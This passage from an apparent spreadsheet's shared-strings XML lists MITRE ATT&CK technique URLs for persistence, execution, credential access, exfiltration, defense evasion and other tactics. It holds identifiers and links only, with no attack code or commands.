    <t>https://attack.mitre.org/techniques/T1547/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1185</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1612</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1115</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1580</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1526</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1619</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1092</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1609</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1613</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1485</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1039</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1025</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1140</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1610</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1482</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1611</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1187</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1615</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</t>
